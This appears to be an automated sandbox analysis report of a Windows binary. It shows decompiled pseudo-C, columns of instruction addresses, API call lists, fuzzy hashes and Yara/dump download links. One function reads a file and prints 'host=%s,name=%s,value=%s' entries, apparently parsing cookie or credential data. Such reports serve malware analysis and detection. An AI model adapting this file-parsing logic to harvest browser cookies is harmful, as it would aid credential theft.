					_t141 = _v24.top;
				}
				E0126FB89(_v104, 0, _t127, _t141, 0xffffffff, 0xffffffff, 0x15);
				return E012833E5(_t127, _v8 ^ _t149, _t136, _t141, _t147);
			}






























                                                                                                                0x0126ac1c
                                                                                                                0x0126ac22
                                                                                                                0x0126ac29
                                                                                                                0x0126ac2d
                                                                                                                0x0126ac31
                                                                                                                0x0126ac34
                                                                                                                0x0126ac3c
                                                                                                                0x0126ac40
                                                                                                                0x0126ac4d
                                                                                                                0x0126ac5f
                                                                                                                0x0126ac4f
                                                                                                                0x0126ac52
                                                                                                                0x0126ac52
                                                                                                                0x0126ac65
                                                                                                                0x0126ac69
                                                                                                                0x0126ac75
                                                                                                                0x0126ac7d
                                                                                                                0x0126ac7f
                                                                                                                0x0126ac7f
                                                                                                                0x0126ac7d
                                                                                                                0x0126ac42
                                                                                                                0x0126ac42
                                                                                                                0x0126ac42
                                                                                                                0x0126ac81
                                                                                                                0x0126ac88
                                                                                                                0x0126ac8c
                                                                                                                0x0126ac90
                                                                                                                0x0126ac98
                                                                                                                0x0126aca0
                                                                                                                0x0126aca3
                                                                                                                0x0126aca6
                                                                                                                0x0126aca9
                                                                                                                0x0126acac
                                                                                                                0x0126acaf
                                                                                                                0x0126acb2
                                                                                                                0x0126acb5
                                                                                                                0x0126acbe
                                                                                                                0x0126ad66
                                                                                                                0x0126ad6d
                                                                                                                0x0126ad74
                                                                                                                0x0126ad7e
                                                                                                                0x0126acc4
                                                                                                                0x0126acc6
                                                                                                                0x0126accb
                                                                                                                0x0126acd6
                                                                                                                0x0126acdf
                                                                                                                0x0126acdf
                                                                                                                0x0126acd6
                                                                                                                0x0126ace1
                                                                                                                0x0126acea
                                                                                                                0x0126ad2d
                                                                                                                0x0126ad33
                                                                                                                0x0126ad3a
                                                                                                                0x0126ad41
                                                                                                                0x0126ad4f
                                                                                                                0x0126acec
                                                                                                                0x0126acec
                                                                                                                0x0126acf3
                                                                                                                0x0126acf5
                                                                                                                0x0126acf5
                                                                                                                0x0126acff
                                                                                                                0x0126ad06
                                                                                                                0x0126ad1a
                                                                                                                0x0126ad24
                                                                                                                0x0126ad24
                                                                                                                0x0126acea
                                                                                                                0x0126ad8d
                                                                                                                0x0126ad90
                                                                                                                0x0126ad97
                                                                                                                0x0126ad9e
                                                                                                                0x0126ada6
                                                                                                                0x0126adb2
                                                                                                                0x0126adba
                                                                                                                0x0126adc1
                                                                                                                0x0126adc6
                                                                                                                0x0126adce
                                                                                                                0x0126adce
                                                                                                                0x0126add4
                                                                                                                0x0126add6
                                                                                                                0x0126add6
                                                                                                                0x0126ade1
                                                                                                                0x0126ade9
                                                                                                                0x0126ade9
                                                                                                                0x0126adef
                                                                                                                0x0126adf1
                                                                                                                0x0126adf1
                                                                                                                0x0126ae01
                                                                                                                0x0126ae16

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0126F75B: GetWindowLongA.USER32 ref: 0126F769
                                                                                                                • GetParent.USER32(?), ref: 0126AC52
                                                                                                                • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 0126AC75
                                                                                                                • GetWindowRect.USER32 ref: 0126AC98
                                                                                                                • GetWindowLongA.USER32 ref: 0126ACCB
                                                                                                                • MonitorFromWindow.USER32(00000000,?), ref: 0126ACFF
                                                                                                                • GetMonitorInfoA.USER32 ref: 0126AD06
                                                                                                                • CopyRect.USER32 ref: 0126AD1A
                                                                                                                • CopyRect.USER32 ref: 0126AD24
                                                                                                                • GetWindowRect.USER32 ref: 0126AD2D
                                                                                                                • MonitorFromWindow.USER32(00000000,00000002), ref: 0126AD3A
                                                                                                                • GetMonitorInfoA.USER32 ref: 0126AD41
                                                                                                                • CopyRect.USER32 ref: 0126AD4F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$Monitor$Copy$FromInfoLong$MessageParentSend
                                                                                                                • String ID: (
                                                                                                                • API String ID: 783970248-3887548279
                                                                                                                • Opcode ID: e419eab3888eac9561ad277f021846fd36529a59189944466b57a88abe1b86db
                                                                                                                • Instruction ID: c69f0058e95c8e804ba1e91c651b02c087c861adfd1f95f09182777e4c5c89d9
                                                                                                                • Opcode Fuzzy Hash: e419eab3888eac9561ad277f021846fd36529a59189944466b57a88abe1b86db
                                                                                                                • Instruction Fuzzy Hash: A0610A7191020AAFDF11DFA8DD88AAEBBBDFF48315F140129E601F7285DB74A944CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10009F42, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 157fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10009F49
                                                                                                                • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,00000060,10009EFE,?), ref: 10009F66
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 10009F79
                                                                                                                • _malloc.LIBCMT ref: 10009F96
                                                                                                                  • Part of subcall function 1007FDFC: __FF_MSGBANNER.LIBCMT ref: 1007FE13
                                                                                                                  • Part of subcall function 1007FDFC: __NMSG_WRITE.LIBCMT ref: 1007FE1A
                                                                                                                  • Part of subcall function 1007FDFC: RtlAllocateHeap.NTDLL(014D0000,00000000,00000001,00000001,?,?,?,1007F6B1,00000001,00000000,?,?,?,1007F5DA,?), ref: 1007FE3F
                                                                                                                • _memset.LIBCMT ref: 10009FB0
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10009FC1
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10009FCC
                                                                                                                • _free.LIBCMT ref: 10009FD3
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10009FDE
                                                                                                                • ___from_strstr_to_strchr.LIBCMT ref: 10009FEF
                                                                                                                • ___from_strstr_to_strchr.LIBCMT ref: 1000A003
                                                                                                                • ___from_strstr_to_strchr.LIBCMT ref: 1000A01B
                                                                                                                • _strstr.LIBCMT ref: 1000A034
                                                                                                                • _wprintf.LIBCMT ref: 1000A08A
                                                                                                                • ___from_strstr_to_strchr.LIBCMT ref: 1000A0BF
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1000A0D9
                                                                                                                Strings
                                                                                                                • host=%s,name=%s,value=%s, xrefs: 1000A085
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ___from_strstr_to_strchr$CloseFileHandle$AllocateCreateH_prolog3_HeapReadSize_free_malloc_memset_strstr_wprintf
                                                                                                                • String ID: host=%s,name=%s,value=%s
                                                                                                                • API String ID: 1822375381-1819955867
                                                                                                                • Opcode ID: 76c1f633e2c2430a77d06739aa21e0c08267b1392cd078c0425a239b2a2c0227
                                                                                                                • Instruction ID: 1e8d3ef09e2cf31bc6e41cc951d7dfc1a7d90a426dbfea2849d45ff191915060
                                                                                                                • Opcode Fuzzy Hash: 76c1f633e2c2430a77d06739aa21e0c08267b1392cd078c0425a239b2a2c0227
                                                                                                                • Instruction Fuzzy Hash: 9441F376D0435AAEF710CBA48C85B6F7BE8EF027D0F200229F5459B186EB715C45C761
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0128101E, Relevance: 29.0, APIs: 19, Instructions: 482COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 41%
                                                                                                                			E0128101E(void* __ebx, signed short* __ecx, void* __edi, void* __esi) {
				signed int* _t161;
				signed short* _t166;
				void* _t168;
				signed int _t182;
				signed short _t184;
				void* _t190;
				signed char* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t203;
				signed short _t206;
				signed short _t229;
				void* _t230;
				void* _t231;
				signed short _t236;
				void* _t240;
				signed int** _t241;
				signed int _t243;
				signed short* _t245;
				signed short* _t247;
				signed int _t251;
				signed short _t260;
				signed short* _t280;
				signed int _t281;
				signed short* _t289;
				signed short _t291;
				signed short* _t292;
				signed short _t293;
				signed short _t294;
				signed int _t296;
				signed int _t298;
				signed short _t299;
				signed short _t300;
				signed char _t301;
				signed short _t302;
				void* _t304;
				void* _t305;
				void* _t306;

				_push(__edi);
				_t289 = __ecx;
				_t296 = 0;
				_t243 = 0;
				if( *((intOrPtr*)(__ecx + 8)) <= 0) {
					L4:
					return _t161;
				} else {
					while(1) {
						_t247 = _t289;
						if( *((intOrPtr*)(E01280811(_t247, _t243))) == _t296) {
							break;
						}
						_t247 = _t289;
						if( *((intOrPtr*)(E01280811(_t247, _t243) + 4)) == _t296) {
							break;
						} else {
							_t240 = E01280811(_t289, _t243);
							_t241 = E01280811(_t289, _t243);
							_t296 = 0;
							_t161 =  *_t241;
							_t243 = _t243 + 1;
							 *_t161 = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t240 + 4)))) != 0x00000000;
							if(_t243 < _t289[4]) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L88;
					}
					E01268275(_t247);
					asm("int3");
					_push(0x7c);
					E01285B7A(E0129832D, _t243, _t289, _t296);
					_t166 = _t247;
					 *(_t304 - 0x24) = _t166;
					_t245 = 0;
					__eflags =  *_t166;
					if( *_t166 != 0) {
						 *(_t304 - 0x54) = 0;
						 *((intOrPtr*)(_t304 - 0x50)) = 0;
						 *(_t304 - 0x4c) = 0;
						 *((intOrPtr*)(_t304 - 0x48)) = 0;
						_t168 = 0x10;
						 *((intOrPtr*)(_t304 - 4)) = 0;
						E01283870(_t304 - 0x54, 0, _t168);
						_t291 =  *(_t304 + 0x18);
						_t306 = _t305 + 0xc;
						__eflags = _t291;
						if(_t291 == 0) {
							_t298 =  *(_t304 - 0x4c);
						} else {
							_t298 = E01283900(_t291);
							 *(_t304 - 0x4c) = _t298;
						}
						__eflags =  *(_t304 + 0xc) & 0x0000000c;
						 *((intOrPtr*)(_t304 - 0x20)) = 0xfffffffd;
						if(( *(_t304 + 0xc) & 0x0000000c) != 0) {
							 *((intOrPtr*)(_t304 - 0x48)) = 1;
							 *((intOrPtr*)(_t304 - 0x50)) = _t304 - 0x20;
						}
						E0128028F(_t304 - 0x68);
						 *((char*)(_t304 - 4)) = 1;
						__eflags = _t298;
						if(__eflags == 0) {
							L36:
							_t292 = _t245;
							E0127E554(_t304 - 0x44);
							_t299 =  *(_t304 + 0x10);
							__eflags = _t299;
							if(_t299 != 0) {
								_t292 = _t304 - 0x44;
							}
							E01283870(_t304 - 0x88, _t245, 0x20);
							 *(_t304 - 0x28) =  *(_t304 - 0x28) | 0xffffffff;
							_t306 = _t306 + 0xc;
							_t293 =  *((intOrPtr*)( *( *( *(_t304 - 0x24))) + 0x18))(_t292, _t304 - 0x88, _t304 - 0x28);
							 *(_t304 + 0x1c) = _t293;
							E0128101E(_t245, _t304 - 0x68, _t293, _t299,  *( *(_t304 - 0x24)),  *((intOrPtr*)(_t304 + 8)), 0x12a0e48, _t245,  *(_t304 + 0xc), _t304 - 0x54);
							_t251 =  *(_t304 - 0x4c);
							__eflags = _t251;
							if(_t251 != 0) {
								 *(_t304 + 0xc) =  *(_t304 - 0x54) + 0xfffffff0 + (_t251 << 4);
								_t229 =  *(_t304 + 0x18);
								__eflags =  *_t229;
								if( *_t229 != 0) {
									_t301 =  *(_t304 + 0xc);
									_t294 = _t229;
									do {
										_t230 =  *_t294;
										__eflags = _t230 - 8;
										if(_t230 == 8) {
											L43:
											__imp__#9(_t301);
										} else {
											__eflags = _t230 - 0xe;
											if(_t230 == 0xe) {
												goto L43;
											}
										}
										_t231 = 0x10;
										_t301 = _t301 - _t231;
										_t294 = _t294 + 1;
										__eflags =  *_t294;
									} while ( *_t294 != 0);
									_t299 =  *(_t304 + 0x10);
									_t293 =  *(_t304 + 0x1c);
								}
							}
							E01262C9F( *(_t304 - 0x54));
							 *(_t304 - 0x54) = _t245;
							__eflags = _t293;
							if(_t293 < 0) {
								__imp__#9(_t304 - 0x44);
								__eflags = _t293 - 0x80020009;
								if(__eflags == 0) {
									goto L59;
								} else {
									L48:
									_push(_t293);
									E01269439(_t245, _t293, _t299, __eflags);
									goto L49;
								}
							}
						} else {
							_t281 = 0x10;
							_t302 = E01262C72(__eflags,  ~(0 | __eflags > 0x00000000) | _t298 * _t281);
							 *(_t304 - 0x54) = _t302;
							E01283870(_t302, _t245,  *(_t304 - 0x4c) << 4);
							_t306 = _t306 + 0x10;
							 *(_t304 - 0x14) = _t291;
							_t280 = ( *(_t304 - 0x4c) << 4) + 0xfffffff0 + _t302;
							__eflags =  *_t291;
							 *(_t304 - 0x10) = _t280;
							if( *_t291 == 0) {
								goto L36;
							} else {
								_t236 =  *(_t304 + 0x1c);
								_t293 =  &(_t280[4]);
								 *(_t304 - 0x1c) = _t293;
								_t300 = 8;
								_t40 = _t236 - 4; // 0x1281293
								_t245 = _t40;
								_t41 = _t236 - 8; // 0x128128f
								_t260 = _t41;
								_t192 =  *(_t304 - 0x14);
								L15:
								_t193 =  *_t192 & 0x000000ff;
								 *_t280 = _t193;
								__eflags = _t193 & 0x00000040;
								if((_t193 & 0x00000040) != 0) {
									_t206 = _t193 & 0x0000ffbf | 0x00004000;
									__eflags = _t206;
									 *_t280 = _t206;
								}
								_t194 =  *_t280 & 0x0000ffff;
								__eflags = _t194 - 0x4002;
								if(__eflags > 0) {
									_t195 = _t194 - 0x4003;
									__eflags = _t195 - 0x12;
									if(_t195 > 0x12) {
										goto L34;
									} else {
										switch( *((intOrPtr*)(_t195 * 4 +  &M012815CC))) {
											case 0:
												goto L24;
											case 1:
												_t245 =  &(_t245[2]);
												 *(_t304 + 0x1c) = _t260 + 4;
												_t262 =  *_t245;
												 *(_t304 - 0x34) = _t262;
												 *(_t304 - 0x30) = _t262;
												asm("sbb eax, eax");
												 *(_t304 - 0x2c) =  *(_t304 - 0x2c) & 0x00000000;
												 *_t262 =  ~( *_t262) & 0x0000ffff;
												 *_t293 = _t262;
												 *((char*)(_t304 - 4)) = 3;
												_push(_t304 - 0x34);
												E01280D95(_t245, _t304 - 0x68, _t293, _t300,  *((intOrPtr*)(_t304 - 0x60)));
												__eflags =  *(_t304 - 0x2c);
												 *((char*)(_t304 - 4)) = 1;
												if( *(_t304 - 0x2c) != 0) {
													E01262C9F( *(_t304 - 0x34));
												}
												goto L32;
											case 2:
												goto L34;
										}
									}
									L85:
									_t166 = E01280340(_t304 - 0x68, _t293);
									__eflags =  *(_t304 - 0x54);
									if( *(_t304 - 0x54) != 0) {
										_t166 = E01262C9F( *(_t304 - 0x54));
									}
									goto L87;
								} else {
									if(__eflags == 0) {
										L24:
										_t260 = _t260 + 4;
										_t245 =  &(_t245[2]);
										 *_t293 =  *_t245;
										goto L34;
									} else {
										_t203 = _t194 - 2;
										__eflags = _t203 - 0x13;
										if(__eflags > 0) {
											L34:
											_t190 = 0x10;
											_t280 = _t280 - _t190;
											_t293 = _t293 - _t190;
											_t192 =  &(( *(_t304 - 0x14))[1]);
											 *(_t304 - 0x10) = _t280;
											 *(_t304 - 0x1c) = _t293;
											 *(_t304 - 0x14) = _t192;
											__eflags =  *_t192;
											if( *_t192 != 0) {
												goto L15;
											} else {
												_t245 = 0;
												__eflags = 0;
												goto L36;
											}
										} else {
											switch( *((intOrPtr*)(_t203 * 4 +  &M0128157C))) {
												case 0:
													__ecx = __ecx + 4;
													__ebx = __ebx + 4;
													__eflags = __ebx;
													__ax =  *__ebx;
													goto L23;
												case 1:
													goto L24;
												case 2:
													__ecx = __ecx + __esi;
													__ebx = __ebx + __esi;
													 *__edi =  *__ecx;
													goto L34;
												case 3:
													__ecx = __ecx + __esi;
													__ebx = __ebx + __esi;
													 *__edi =  *__ecx;
													goto L34;
												case 4:
													__ecx = __ecx + 4;
													__ebx = __ebx + 4;
													 *(__ebp + 0x1c) = __ecx;
													__ecx =  *__ebx;
													__eax =  *__ecx;
													 *__edi =  *__ecx;
													_t50 = __ecx + 4; // 0x984d8df8
													__eax =  *_t50;
													 *(__edi + 4) = __eax;
													goto L33;
												case 5:
													__ebx = __ebx + 4;
													__ecx = __ecx + 4;
													 *(__ebp + 0x1c) = __ecx;
													__esi =  *__ebx;
													_push(__esi);
													__imp__#2();
													 *__edi = __eax;
													__eflags = __esi;
													if(__esi == 0) {
														L31:
														_push(8);
														_pop(__esi);
														goto L32;
													} else {
														__eflags = __eax;
														if(__eax == 0) {
															goto L58;
														} else {
															goto L31;
														}
													}
													goto L70;
												case 6:
													__ebx = __ebx + 4;
													__ecx = __ecx + 4;
													__eax =  *__ebx;
													__eax =  ~( *__ebx);
													asm("sbb eax, eax");
													L23:
													 *__edi = __ax;
													goto L34;
												case 7:
													__ecx = __ecx + 4;
													__edi = __edx;
													__ebx = __ebx + 4;
													_push(8);
													__esi =  *__ebx;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__edi =  *(__ebp - 0x1c);
													_pop(__esi);
													goto L34;
												case 8:
													L49:
													_t245 =  &(_t245[2]);
													 *(_t304 + 0x1c) =  &(_t252[2]);
													_t257 = _t304 - 0x18;
													_t299 =  *_t245;
													_push(_t299);
													_t187 = E012633C1(_t245, _t304 - 0x18, _t293, _t299, __eflags);
													_push( *((intOrPtr*)(_t304 - 0x18)));
													 *((char*)(_t304 - 4)) = 2;
													__imp__#2();
													 *_t293 = _t187;
													__eflags = _t299;
													if(_t299 == 0) {
														L51:
														_push(8);
														_pop(_t300);
														 *((char*)(_t304 - 4)) = 1;
														 *( *(_t304 - 0x10)) = _t300;
														E012615E0( *((intOrPtr*)(_t304 - 0x18)) - 0x10, _t279);
														L32:
														_t280 =  *(_t304 - 0x10);
														L33:
														_t260 =  *(_t304 + 0x1c);
														goto L34;
													} else {
														__eflags = _t187;
														if(_t187 == 0) {
															L58:
															E0126828F(_t257);
															L59:
															_t208 =  *(_t304 - 0x70);
															__eflags = _t208;
															if(__eflags != 0) {
																_push(_t304 - 0x88);
																 *_t208();
															}
															_t209 = E01262C72(__eflags, 0x20);
															_pop(_t252);
															 *(_t304 + 0x14) = _t209;
															 *((char*)(_t304 - 4)) = 4;
															__eflags = _t209;
															if(__eflags != 0) {
																_push( *((intOrPtr*)(_t304 - 0x88)));
																_t252 = _t209;
																_push(_t245);
																_push(_t245);
																_t245 = E012802A6(_t245, _t252, _t293, _t299, __eflags);
															}
															_push( *((intOrPtr*)(_t304 - 0x84)));
															_t299 = __imp__#7;
															 *((char*)(_t304 - 4)) = 1;
															_t210 =  *_t299();
															__eflags = _t210;
															if(_t210 != 0) {
																_t115 =  &(_t245[0xc]); // 0x18
																_t252 = _t115;
																E012693C6(_t252,  *((intOrPtr*)(_t304 - 0x84)));
															}
															_push( *((intOrPtr*)(_t304 - 0x84)));
															_t293 = __imp__#6;
															 *_t293();
															_push( *((intOrPtr*)(_t304 - 0x80)));
															_t212 =  *_t299();
															__eflags = _t212;
															if(_t212 != 0) {
																_t119 =  &(_t245[6]); // 0xc
																_t252 = _t119;
																E012693C6(_t252,  *((intOrPtr*)(_t304 - 0x80)));
															}
															_push( *((intOrPtr*)(_t304 - 0x80)));
															 *_t293();
															_push( *((intOrPtr*)(_t304 - 0x7c)));
															_t214 =  *_t299();
															__eflags = _t214;
															if(_t214 != 0) {
																_t123 =  &(_t245[0xa]); // 0x14
																_t252 = _t123;
																E012693C6(_t252,  *((intOrPtr*)(_t304 - 0x7c)));
															}
															_push( *((intOrPtr*)(_t304 - 0x7c)));
															 *_t293();
															_t245[8] =  *(_t304 - 0x78);
															_t245[0xe] =  *(_t304 - 0x6c);
															 *(_t304 + 0x14) = _t245;
															E012864EA(_t304 + 0x14, 0x12a7180);
														} else {
															goto L51;
														}
													}
													goto L70;
												case 9:
													goto L34;
												case 0xa:
													_t260 = _t260 + 4;
													_t245 =  &(_t245[2]);
													 *_t293 =  *_t245;
													goto L34;
												case 0xb:
													__ecx = __ecx + __esi;
													__ebx = __ebx + __esi;
													__eax =  *__ecx;
													 *__edi =  *__ecx;
													__eax =  *(__ecx + 4);
													 *(__edi + 4) = __eax;
													goto L34;
											}
										}
									}
								}
							}
						}
						L70:
						__eflags = _t299;
						if(_t299 != 0) {
							__eflags = _t299 - 0xc;
							if(_t299 == 0xc) {
								L74:
								_t182 = (_t299 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t182 - 0x13;
								if(_t182 <= 0x13) {
									switch( *((intOrPtr*)(_t182 * 4 +  &M01281618))) {
										case 0:
											__ecx =  *(__ebp + 0x14);
											__ax =  *(__ebp - 0x3c);
											 *__ecx =  *(__ebp - 0x3c);
											goto L85;
										case 1:
											__ecx =  *(__ebp + 0x14);
											__eax =  *(__ebp - 0x3c);
											 *__ecx =  *(__ebp - 0x3c);
											goto L85;
										case 2:
											__eax =  *(__ebp + 0x14);
											 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
											goto L85;
										case 3:
											__eax =  *(__ebp + 0x14);
											 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
											goto L85;
										case 4:
											__ecx =  *(__ebp + 0x14);
											__eax =  *(__ebp - 0x3c);
											 *__ecx =  *(__ebp - 0x3c);
											__eax =  *(__ebp - 0x38);
											 *(__ecx + 4) =  *(__ebp - 0x38);
											goto L85;
										case 5:
											__eax = E0127EE2B(__eax,  *(__ebp + 0x14),  *(__ebp - 0x3c));
											_push( *(__ebp - 0x3c));
											__imp__#6();
											goto L85;
										case 6:
											__eax =  *(__ebp + 0x14);
											__ecx = 0;
											__eflags =  *(__ebp - 0x3c) - __cx;
											__ecx = 0 |  *(__ebp - 0x3c) != __cx;
											 *( *(__ebp + 0x14)) = __ecx;
											goto L85;
										case 7:
											__edi =  *(__ebp + 0x14);
											__esi = __ebp - 0x44;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L85;
										case 8:
											goto L85;
										case 9:
											 *( *(_t304 + 0x14)) =  *((intOrPtr*)(_t304 - 0x3c));
											goto L85;
									}
								}
							} else {
								_t184 = _t304 - 0x44;
								__imp__#12(_t184, _t184, _t245, _t299);
								_t293 = _t184;
								__eflags = _t293;
								if(__eflags >= 0) {
									goto L74;
								} else {
									__imp__#9(_t304 - 0x44);
									goto L48;
								}
							}
						}
						goto L85;
					}
					L87:
					return E01285B48(_t166);
				}
				L88:
			}










































                                                                                                                0x01281020
                                                                                                                0x01281021
                                                                                                                0x01281023
                                                                                                                0x01281025
                                                                                                                0x0128102a
                                                                                                                0x0128106e
                                                                                                                0x01281071
                                                                                                                0x0128102c
                                                                                                                0x0128102c
                                                                                                                0x0128102d
                                                                                                                0x01281036
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281039
                                                                                                                0x01281043
                                                                                                                0x00000000
                                                                                                                0x01281045
                                                                                                                0x01281048
                                                                                                                0x01281052
                                                                                                                0x0128105c
                                                                                                                0x0128105e
                                                                                                                0x01281066
                                                                                                                0x01281067
                                                                                                                0x0128106c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0128106c
                                                                                                                0x00000000
                                                                                                                0x01281043
                                                                                                                0x01281072
                                                                                                                0x01281077
                                                                                                                0x01281078
                                                                                                                0x0128107f
                                                                                                                0x01281084
                                                                                                                0x01281086
                                                                                                                0x01281089
                                                                                                                0x0128108b
                                                                                                                0x0128108d
                                                                                                                0x01281093
                                                                                                                0x01281096
                                                                                                                0x01281099
                                                                                                                0x0128109c
                                                                                                                0x012810a1
                                                                                                                0x012810a6
                                                                                                                0x012810ab
                                                                                                                0x012810b0
                                                                                                                0x012810b3
                                                                                                                0x012810b6
                                                                                                                0x012810b8
                                                                                                                0x012810c8
                                                                                                                0x012810ba
                                                                                                                0x012810c0
                                                                                                                0x012810c3
                                                                                                                0x012810c3
                                                                                                                0x012810cb
                                                                                                                0x012810cf
                                                                                                                0x012810d6
                                                                                                                0x012810db
                                                                                                                0x012810e2
                                                                                                                0x012810e2
                                                                                                                0x012810e8
                                                                                                                0x012810ed
                                                                                                                0x012810f1
                                                                                                                0x012810f3
                                                                                                                0x01281237
                                                                                                                0x0128123a
                                                                                                                0x0128123d
                                                                                                                0x01281242
                                                                                                                0x01281245
                                                                                                                0x01281248
                                                                                                                0x0128124a
                                                                                                                0x0128124a
                                                                                                                0x01281257
                                                                                                                0x01281262
                                                                                                                0x01281266
                                                                                                                0x0128128a
                                                                                                                0x0128128f
                                                                                                                0x01281292
                                                                                                                0x01281297
                                                                                                                0x0128129a
                                                                                                                0x0128129c
                                                                                                                0x012812a9
                                                                                                                0x012812ac
                                                                                                                0x012812af
                                                                                                                0x012812b2
                                                                                                                0x012812b4
                                                                                                                0x012812b7
                                                                                                                0x012812b9
                                                                                                                0x012812b9
                                                                                                                0x012812bb
                                                                                                                0x012812bd
                                                                                                                0x012812c3
                                                                                                                0x012812c4
                                                                                                                0x012812bf
                                                                                                                0x012812bf
                                                                                                                0x012812c1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012812c1
                                                                                                                0x012812cc
                                                                                                                0x012812cd
                                                                                                                0x012812cf
                                                                                                                0x012812d0
                                                                                                                0x012812d0
                                                                                                                0x012812d5
                                                                                                                0x012812d8
                                                                                                                0x012812d8
                                                                                                                0x012812b2
                                                                                                                0x012812de
                                                                                                                0x012812e3
                                                                                                                0x012812e7
                                                                                                                0x012812e9
                                                                                                                0x012812f3
                                                                                                                0x012812f9
                                                                                                                0x012812ff
                                                                                                                0x00000000
                                                                                                                0x01281305
                                                                                                                0x01281305
                                                                                                                0x01281305
                                                                                                                0x01281306
                                                                                                                0x00000000
                                                                                                                0x01281306
                                                                                                                0x012812ff
                                                                                                                0x012810f9
                                                                                                                0x012810ff
                                                                                                                0x01281112
                                                                                                                0x0128111a
                                                                                                                0x0128111d
                                                                                                                0x01281125
                                                                                                                0x0128112e
                                                                                                                0x01281131
                                                                                                                0x01281133
                                                                                                                0x01281136
                                                                                                                0x01281139
                                                                                                                0x00000000
                                                                                                                0x0128113f
                                                                                                                0x0128113f
                                                                                                                0x01281142
                                                                                                                0x01281147
                                                                                                                0x0128114a
                                                                                                                0x0128114b
                                                                                                                0x0128114b
                                                                                                                0x0128114e
                                                                                                                0x0128114e
                                                                                                                0x01281151
                                                                                                                0x01281154
                                                                                                                0x01281154
                                                                                                                0x01281157
                                                                                                                0x0128115a
                                                                                                                0x0128115c
                                                                                                                0x01281163
                                                                                                                0x01281163
                                                                                                                0x01281168
                                                                                                                0x01281168
                                                                                                                0x0128116b
                                                                                                                0x0128116e
                                                                                                                0x01281173
                                                                                                                0x01281381
                                                                                                                0x01281386
                                                                                                                0x01281389
                                                                                                                0x00000000
                                                                                                                0x0128138f
                                                                                                                0x0128138f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281396
                                                                                                                0x0128139c
                                                                                                                0x0128139f
                                                                                                                0x012813a1
                                                                                                                0x012813a4
                                                                                                                0x012813ab
                                                                                                                0x012813ad
                                                                                                                0x012813b6
                                                                                                                0x012813b8
                                                                                                                0x012813bd
                                                                                                                0x012813c1
                                                                                                                0x012813c8
                                                                                                                0x012813cd
                                                                                                                0x012813d1
                                                                                                                0x012813d5
                                                                                                                0x012813de
                                                                                                                0x012813e3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0128138f
                                                                                                                0x0128155a
                                                                                                                0x0128155d
                                                                                                                0x01281562
                                                                                                                0x01281566
                                                                                                                0x0128156b
                                                                                                                0x01281570
                                                                                                                0x00000000
                                                                                                                0x01281179
                                                                                                                0x01281179
                                                                                                                0x012811a8
                                                                                                                0x012811a8
                                                                                                                0x012811ab
                                                                                                                0x012811b0
                                                                                                                0x00000000
                                                                                                                0x0128117b
                                                                                                                0x0128117b
                                                                                                                0x0128117e
                                                                                                                0x01281181
                                                                                                                0x01281218
                                                                                                                0x0128121a
                                                                                                                0x0128121b
                                                                                                                0x0128121d
                                                                                                                0x01281222
                                                                                                                0x01281223
                                                                                                                0x01281226
                                                                                                                0x01281229
                                                                                                                0x0128122c
                                                                                                                0x0128122f
                                                                                                                0x00000000
                                                                                                                0x01281235
                                                                                                                0x01281235
                                                                                                                0x01281235
                                                                                                                0x00000000
                                                                                                                0x01281235
                                                                                                                0x01281187
                                                                                                                0x01281187
                                                                                                                0x00000000
                                                                                                                0x0128119a
                                                                                                                0x0128119d
                                                                                                                0x0128119d
                                                                                                                0x012811a0
